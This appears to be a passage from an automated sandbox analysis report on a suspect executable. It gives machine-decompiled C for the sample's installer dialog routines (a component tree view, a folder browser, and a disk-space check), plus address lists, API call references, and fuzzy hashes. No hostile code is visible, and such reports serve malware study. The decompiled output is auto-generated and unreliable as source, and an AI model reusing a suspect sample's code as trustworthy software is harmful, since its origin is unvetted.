				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ea8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423e90 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423e99 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E0040464A(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423e98) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420454;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42046c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420454 = _t315;
								 *0x42046c = _t315;
								 *0x423ee0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423e99 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42046c;
									_t196 =  *0x423ea8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423eac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42365c + 0x10)) != _t315) {
											E00404568(0x3ff, 0xfffffffb, E0040461D(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423eac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42046c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423ee0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42046c = GlobalAlloc(0x40,  *0x423eac << 2);
					_t250 = LoadBitmapA( *0x423e80, 0x6e);
					 *0x420460 =  *0x420460 | 0xffffffff;
					_v24 = _t250;
					 *0x420468 = SetWindowLongA(_v8, 0xfffffffc, E00404CCB);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420454 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420454);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059FF(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403D8F(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403D8F(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423eac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42046c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42046c + _t318 * 4) = _t274;
									_t288 =  *( *0x42046c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423eac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DC4(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DC4(_v12);
								L89:
								return E00403DF6(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                0x004046e8
                                                                                0x004046ee
                                                                                0x004046f0
                                                                                0x004046f6
                                                                                0x004046fc
                                                                                0x00404709
                                                                                0x00404712
                                                                                0x00404715
                                                                                0x00404718
                                                                                0x00404940
                                                                                0x00404947
                                                                                0x0040495b
                                                                                0x00404949
                                                                                0x0040494b
                                                                                0x0040494e
                                                                                0x0040494f
                                                                                0x00404956
                                                                                0x00404956
                                                                                0x00404967
                                                                                0x00404975
                                                                                0x00404978
                                                                                0x0040498e
                                                                                0x00404a06
                                                                                0x00404a09
                                                                                0x00404a0b
                                                                                0x00404a15
                                                                                0x00404a23
                                                                                0x00404a23
                                                                                0x00404a25
                                                                                0x00404a2f
                                                                                0x00404a35
                                                                                0x00404a56
                                                                                0x00404a37
                                                                                0x00404a44
                                                                                0x00404a44
                                                                                0x00404a35
                                                                                0x00404a2f
                                                                                0x00000000
                                                                                0x00404a09
                                                                                0x00404993
                                                                                0x0040499e
                                                                                0x004049a3
                                                                                0x004049aa
                                                                                0x004049b1
                                                                                0x004049bb
                                                                                0x004049bb
                                                                                0x004049bf
                                                                                0x004049c4
                                                                                0x004049c9
                                                                                0x004049df
                                                                                0x004049cb
                                                                                0x004049cb
                                                                                0x004049d3
                                                                                0x004049da
                                                                                0x004049d5
                                                                                0x004049d5
                                                                                0x004049d5
                                                                                0x004049d3
                                                                                0x004049e3
                                                                                0x004049e5
                                                                                0x004049f3
                                                                                0x004049f4
                                                                                0x00404a00
                                                                                0x00404a03
                                                                                0x00404a03
                                                                                0x004049c4
                                                                                0x00000000
                                                                                0x004049b1
                                                                                0x00404995
                                                                                0x0040499c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404a59
                                                                                0x00404a59
                                                                                0x00404a60
                                                                                0x00404ad4
                                                                                0x00404adb
                                                                                0x00404ae7
                                                                                0x00404ae7
                                                                                0x00404af0
                                                                                0x00404af2
                                                                                0x00404af9
                                                                                0x00404afc
                                                                                0x00404afc
                                                                                0x00404b02
                                                                                0x00404b09
                                                                                0x00404b0c
                                                                                0x00404b0c
                                                                                0x00404b12
                                                                                0x00404b18
                                                                                0x00404b1e
                                                                                0x00404b1e
                                                                                0x00404b2b
                                                                                0x00404c78
                                                                                0x00404c7f
                                                                                0x00404c9c
                                                                                0x00404ca2
                                                                                0x00404cb4
                                                                                0x00404cb4
                                                                                0x00000000
                                                                                0x00404b31
                                                                                0x00404b33
                                                                                0x00404b3b
                                                                                0x00404b3f
                                                                                0x00404b3f
                                                                                0x00404b47
                                                                                0x00404b88
                                                                                0x00404b8a
                                                                                0x00404b9a
                                                                                0x00404b9d
                                                                                0x00404ba2
                                                                                0x00404ba9
                                                                                0x00404bac
                                                                                0x00404c4e
                                                                                0x00404c54
                                                                                0x00404c62
                                                                                0x00404c73
                                                                                0x00404c73
                                                                                0x00000000
                                                                                0x00404c62
                                                                                0x00404bb2
                                                                                0x00404bb5
                                                                                0x00404bbb
                                                                                0x00404bc0
                                                                                0x00404bc2
                                                                                0x00404bc4
                                                                                0x00404bca
                                                                                0x00404bd1
                                                                                0x00404bd6
                                                                                0x00404bdd
                                                                                0x00404be0
                                                                                0x00404be0
                                                                                0x00404be7
                                                                                0x00404bf3
                                                                                0x00404bf7
                                                                                0x00404bf9
                                                                                0x00404bf9
                                                                                0x00404be9
                                                                                0x00404beb
                                                                                0x00404beb
                                                                                0x00404c19
                                                                                0x00404c25
                                                                                0x00404c34
                                                                                0x00404c34
                                                                                0x00404c36
                                                                                0x00404c39
                                                                                0x00404c42
                                                                                0x00000000
                                                                                0x00404b49
                                                                                0x00404b54
                                                                                0x00404b57
                                                                                0x00404b5c
                                                                                0x00404b5e
                                                                                0x00404b62
                                                                                0x00404b72
                                                                                0x00404b7c
                                                                                0x00404b7e
                                                                                0x00404b81
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404b64
                                                                                0x00404b64
                                                                                0x00404b6a
                                                                                0x00404b6c
                                                                                0x00404b6c
                                                                                0x00404b6d
                                                                                0x00404b6e
                                                                                0x00000000
                                                                                0x00404b64
                                                                                0x00404b47
                                                                                0x00404b2b
                                                                                0x00404a68
                                                                                0x00000000
                                                                                0x00404a7e
                                                                                0x00404a88
                                                                                0x00404a8d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404a9f
                                                                                0x00404aa4
                                                                                0x00404ab0
                                                                                0x00404ab0
                                                                                0x00404ab2
                                                                                0x00404ac1
                                                                                0x00404ac3
                                                                                0x00404aca
                                                                                0x00404acd
                                                                                0x00000000
                                                                                0x00404acd
                                                                                0x00404a68
                                                                                0x0040471e
                                                                                0x00404723
                                                                                0x0040472d
                                                                                0x0040472e
                                                                                0x00404737
                                                                                0x00404742
                                                                                0x0040474d
                                                                                0x00404753
                                                                                0x00404761
                                                                                0x00404776
                                                                                0x0040477b
                                                                                0x00404786
                                                                                0x0040478f
                                                                                0x004047a4
                                                                                0x004047b5
                                                                                0x004047c2
                                                                                0x004047c2
                                                                                0x004047c7
                                                                                0x004047cd
                                                                                0x004047cf
                                                                                0x004047d2
                                                                                0x004047d7
                                                                                0x004047dc
                                                                                0x004047de
                                                                                0x004047de
                                                                                0x004047fe
                                                                                0x004047fe
                                                                                0x00404800
                                                                                0x00404801
                                                                                0x00404806
                                                                                0x00404809
                                                                                0x0040480c
                                                                                0x00404810
                                                                                0x00404815
                                                                                0x0040481a
                                                                                0x0040481e
                                                                                0x00404823
                                                                                0x00404828
                                                                                0x0040482a
                                                                                0x00404832
                                                                                0x004048fc
                                                                                0x0040490f
                                                                                0x00000000
                                                                                0x00404838
                                                                                0x0040483b
                                                                                0x0040483e
                                                                                0x00404841
                                                                                0x00404841
                                                                                0x00404847
                                                                                0x0040484d
                                                                                0x00404850
                                                                                0x00404856
                                                                                0x00404857
                                                                                0x0040485c
                                                                                0x00404865
                                                                                0x0040486c
                                                                                0x0040486f
                                                                                0x00404872
                                                                                0x00404875
                                                                                0x004048b1
                                                                                0x004048da
                                                                                0x004048b3
                                                                                0x004048c0
                                                                                0x004048c0
                                                                                0x00404877
                                                                                0x0040487a
                                                                                0x00404889
                                                                                0x00404893
                                                                                0x0040489b
                                                                                0x004048a2
                                                                                0x004048aa
                                                                                0x004048aa
                                                                                0x00404875
                                                                                0x004048e0
                                                                                0x004048e1
                                                                                0x004048ed
                                                                                0x004048ed
                                                                                0x004048fa
                                                                                0x00404915
                                                                                0x00404919
                                                                                0x00404936
                                                                                0x0040493b
                                                                                0x0040493e
                                                                                0x00000000
                                                                                0x0040491b
                                                                                0x00404920
                                                                                0x00404929
                                                                                0x00404cb6
                                                                                0x00404cc8
                                                                                0x00404cc8
                                                                                0x00404919
                                                                                0x00000000
                                                                                0x004048fa
                                                                                0x00404832

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 1638840714-813528018
                                                                                • Opcode ID: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                                                                • Opcode Fuzzy Hash: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                                                                • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004041CD, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 266stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E004041CD(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr* _t138;
				signed int* _t145;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc48;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E00405282(0x3fb, _t162);
					E00405C3B(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405282(0x3fb, _t162);
							if(E004055B1(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E004059DD(0x41f440, _t162);
							_t145 = 0;
							_t86 = E00405CFB(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E004059DD(0x41f440, _t162);
								_t88 = E00405564(0x41f440);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f440,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f440) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f440,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405517(0x41f440) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f440) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040461D(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42365c + 0x10)) != _t145) {
									E00404568(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f430);
									} else {
										E00404568(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f24 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403DB1(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420464 == _t145) {
									E00404162();
								}
								 *0x420464 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420478;
							_v56 = E00404502;
							_v52 = _t162;
							_v64 = E004059FF(0x3fb, 0x420478, _t162, 0x41f848, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004054D0(_t162);
								_t125 =  *((intOrPtr*)( *0x423e90 + 0x11c));
								if( *((intOrPtr*)( *0x423e90 + 0x11c)) != 0 && _t162 == 0x429400) {
									E004059FF(0x3fb, 0x420478, _t162, 0, _t125);
									if(lstrcmpiA(0x422e20, 0x420478) != 0) {
										lstrcatA(_t162, 0x422e20);
									}
								}
								 *0x420464 =  &(( *0x420464)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040553D(_t162) != 0 && E00405564(_t162) == 0) {
						E004054D0(_t162);
					}
					 *0x423658 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403D8F(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403D8F(_t159);
					E00403DC4(_v12);
					_t138 = E00405CFB(7);
					if(_t138 == 0) {
						L53:
						return E00403DF6(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                                                                                0x004041d3
                                                                                0x004041da
                                                                                0x004041e6
                                                                                0x004041f4
                                                                                0x004041fc
                                                                                0x00404200
                                                                                0x00404206
                                                                                0x00404206
                                                                                0x00404212
                                                                                0x00404286
                                                                                0x0040428d
                                                                                0x00404362
                                                                                0x00404369
                                                                                0x00404378
                                                                                0x00404378
                                                                                0x0040437c
                                                                                0x00404382
                                                                                0x0040438f
                                                                                0x00404391
                                                                                0x00404391
                                                                                0x0040439f
                                                                                0x004043a4
                                                                                0x004043a7
                                                                                0x004043ae
                                                                                0x004043b1
                                                                                0x004043e8
                                                                                0x004043ea
                                                                                0x004043f0
                                                                                0x004043f7
                                                                                0x004043f9
                                                                                0x004043f9
                                                                                0x00404415
                                                                                0x00404451
                                                                                0x00000000
                                                                                0x00404417
                                                                                0x0040441a
                                                                                0x0040442e
                                                                                0x00404430
                                                                                0x00000000
                                                                                0x00404430
                                                                                0x004043b3
                                                                                0x004043b7
                                                                                0x004043e6
                                                                                0x004043e6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004043b9
                                                                                0x004043b9
                                                                                0x004043c6
                                                                                0x004043cb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004043cf
                                                                                0x004043d1
                                                                                0x004043d1
                                                                                0x004043dc
                                                                                0x004043df
                                                                                0x004043e4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004043e4
                                                                                0x0040443f
                                                                                0x00404446
                                                                                0x0040444d
                                                                                0x00404454
                                                                                0x00404454
                                                                                0x00404459
                                                                                0x0040445b
                                                                                0x00404463
                                                                                0x00404469
                                                                                0x00404469
                                                                                0x00404479
                                                                                0x00404483
                                                                                0x0040448b
                                                                                0x004044a1
                                                                                0x0040448d
                                                                                0x00404491
                                                                                0x00404491
                                                                                0x0040448b
                                                                                0x004044a6
                                                                                0x004044ab
                                                                                0x004044b0
                                                                                0x004044b9
                                                                                0x004044b9
                                                                                0x004044c2
                                                                                0x004044c4
                                                                                0x004044c4
                                                                                0x004044d0
                                                                                0x004044d8
                                                                                0x004044e2
                                                                                0x004044e2
                                                                                0x004044e7
                                                                                0x00000000
                                                                                0x004044e7
                                                                                0x004043b1
                                                                                0x0040436b
                                                                                0x00404372
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404372
                                                                                0x00404293
                                                                                0x00404299
                                                                                0x004042b3
                                                                                0x004042b8
                                                                                0x004042c2
                                                                                0x004042c9
                                                                                0x004042d8
                                                                                0x004042db
                                                                                0x004042de
                                                                                0x004042e5
                                                                                0x004042ed
                                                                                0x004042f0
                                                                                0x004042f4
                                                                                0x004042fb
                                                                                0x00404303
                                                                                0x0040435b
                                                                                0x00404305
                                                                                0x00404306
                                                                                0x0040430d
                                                                                0x00404317
                                                                                0x0040431f
                                                                                0x0040432c
                                                                                0x00404340
                                                                                0x00404344
                                                                                0x00404344
                                                                                0x00404340
                                                                                0x00404349
                                                                                0x00404354
                                                                                0x00404354
                                                                                0x00404303
                                                                                0x00000000
                                                                                0x004042b8
                                                                                0x004042a6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004042ac
                                                                                0x00000000
                                                                                0x00404214
                                                                                0x00404214
                                                                                0x00404220
                                                                                0x0040422a
                                                                                0x00404237
                                                                                0x00404237
                                                                                0x0040423d
                                                                                0x00404246
                                                                                0x0040424f
                                                                                0x00404252
                                                                                0x00404255
                                                                                0x0040425d
                                                                                0x00404260
                                                                                0x00404263
                                                                                0x0040426b
                                                                                0x00404272
                                                                                0x00404279
                                                                                0x004044ed
                                                                                0x004044ff
                                                                                0x004044ff
                                                                                0x00404284
                                                                                0x00000000
                                                                                0x00404284

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 00404219
                                                                                • SetWindowTextA.USER32(?,?), ref: 00404246
                                                                                • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                                                                • lstrcmpiA.KERNEL32(Bgcedtxsf,00420478,00000000,?,?), ref: 00404338
                                                                                • lstrcatA.KERNEL32(?,Bgcedtxsf), ref: 00404344
                                                                                • SetDlgItemTextA.USER32 ref: 00404354
                                                                                  • Part of subcall function 00405282: GetDlgItemTextA.USER32 ref: 00405295
                                                                                  • Part of subcall function 00405C3B: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C93
                                                                                  • Part of subcall function 00405C3B: CharNextA.USER32(?,?,?,00000000), ref: 00405CA0
                                                                                  • Part of subcall function 00405C3B: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA5
                                                                                  • Part of subcall function 00405C3B: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\h8lD4SWL35.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB5
                                                                                • GetDiskFreeSpaceA.KERNEL32(0041F440,?,?,0000040F,?,0041F440,0041F440,?,00000000,0041F440,?,?,000003FB,?), ref: 0040440D
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                                                                • SetDlgItemTextA.USER32 ref: 004044A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                • String ID: A$Bgcedtxsf
                                                                                • API String ID: 2246997448-2148839213
                                                                                • Opcode ID: 81ffe61aaa1c9f2041f3cf4497dedd052c898a949e9f782c2c7e4d1244574cab
                                                                                • Instruction ID: 3da069567ab04351bdc414ee5a67cb80684ccfdd43f7d199d0639c12f6ec3124
                                                                                • Opcode Fuzzy Hash: 81ffe61aaa1c9f2041f3cf4497dedd052c898a949e9f782c2c7e4d1244574cab
                                                                                • Instruction Fuzzy Hash: 209175B1A00219ABDF11AFA1CC84AAF7BB8EF44354F10407BFA04B62D1D77C9A41DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

